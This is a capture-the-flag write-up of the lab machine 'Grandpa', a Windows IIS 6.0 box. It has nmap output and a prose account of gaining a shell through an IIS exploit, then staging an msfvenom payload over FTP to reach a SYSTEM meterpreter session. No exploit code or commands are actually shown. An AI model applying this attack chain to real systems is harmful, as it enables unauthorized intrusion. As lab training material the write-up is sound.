Grandpa
OS: Windows, Difficulty: Easy, IP: 10.10.10.14
Initial Enumeration
# Nmap 7.70 scan initiated Sat Jul 20 14:38:04 2019 as: nmap -sV -sC -O -A -p 80 -oN O-detailed 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unkown
| Server Date: Sat, 20 Jul 2019 09:01:36 GMT
| Server Type: Microsoft-IIS/6.0
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 230.48 ms 10.10.14.1
2 230.74 ms 10.10.10.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 20 14:38:23 2019 -- 1 IP address (1 host up) scanned in 18.76 seconds
Only the web-server port was open so the obvious choice to look at it, but it was an error with no information, so I started smashing it with gobuster, dirbuster, and dirb, got few directories and with a little study found out that it was running FrontPage 5.X.Y.Z, tried some exploits, they didn't seem to work. So I attacked the IIS 6.0 server itself, apparently none of the MSF modules worked for me, so I chose the manual route and used the exploit mentioned below to get a low privileged shell.
Now plan of action was to upgrade this shell to NT Authority/SYSTEM, as this shell didn't even get me the user flag. I tried running windows exploit suggester and tried many exploits without metasploit but they didn't seem to work, however they should have, but to no avail, they didn't work for me.
Next plan of action was to upgrade the current shell to meterpreter to get better control. The main struggle was how to upload and execute my msfvenom payload. After a little research I learned that FTP can be used to achieve this task, however the shell was unstable to I can not send commands as usual but, ftp had me covered here.
Start your own FTP server using twistd. This allows anonymous logins
On the windows box, I created a file with all the FTP commands that will fetch me my payload and put into the current directory (I chose %TEMP%)
Now, run these commands using ftp flags
This got me my payload on the box, and now I ran the payload to get a meterpreter shell.
However even with the system meterpreter shell I was not able to interact with the shells, so I had to migrate to another process and launch shell again to get interaction.
User Own
Root Own
Learning Outcome
Learned quite a bunch from this box, how to target known vulnerabilities first, rather hunting down my own. How to use FTP to transfer files. Instability of exploits, something may work for somebody but, may not work for you. Overall a fun box.
Last updated
Was this helpful?